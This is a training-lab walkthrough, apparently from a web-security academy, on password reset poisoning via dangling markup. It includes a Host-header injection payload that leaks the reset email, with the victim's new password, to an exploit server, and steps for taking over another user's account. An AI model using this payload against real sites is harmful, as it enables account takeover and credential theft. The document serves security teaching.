Lab: Password reset poisoning via dangling markup
This lab is vulnerable to password reset poisoning via dangling markup. To solve the lab, log in to Carlos's account.
You can log in to your own account using the following credentials:
wiener:peter. Any emails sent to this account can be read via the email client on the exploit server.
Some antivirus software scans links in emails to identify whether they are malicious.
- Go to the login page and request a password reset for your own account.
- Go to the exploit server and open the email client to find the password reset email. Observe that the link in the email simply points to the generic login page and the URL does not contain a password reset token. Instead, a new password is sent directly in the email body text.
In the proxy history, study the response to the
GET /emailrequest. Observe that the HTML content for your email is written to a string, but this is being sanitized using the
DOMPurifylibrary before it is rendered by the browser.
- In the email client, notice that you have the option to view each email as raw HTML instead. Unlike the rendered version of the email, this does not appear to be sanitized in any way.
POST /forgot-passwordrequest to Burp Repeater. Observe that tampering with the domain name in the Host header results in a server error. However, you are able to add an arbitrary, non-numeric port to the Host header and still reach the site as normal. Sending this request will still trigger a password reset email:
- In the email client, check the raw version of your emails. Notice that your injected port is reflected inside a link as an unescaped, single-quoted string. This is later followed by the new password.
POST /forgot-passwordrequest again, but this time use the port to break out of the string and inject a dangling-markup payload pointing to your exploit server:
Host: YOUR-LAB-ID.web-security-academy.net:'<a href="//YOUR-EXPLOIT-SERVER-ID.exploit-server.net/?
Check the email client. You should have received a new email in which most of the content is missing. Go to the exploit server and check the access log. Notice that there is an entry for a request that begins
GET /?/login'>[…], which contains the rest of the email body, including the new password.
In Burp Repeater, send the request one last time, but change the
carlos. Refresh the access log and obtain Carlos's new password from the corresponding log entry.
Log in as
carlosusing this new password to solve the lab.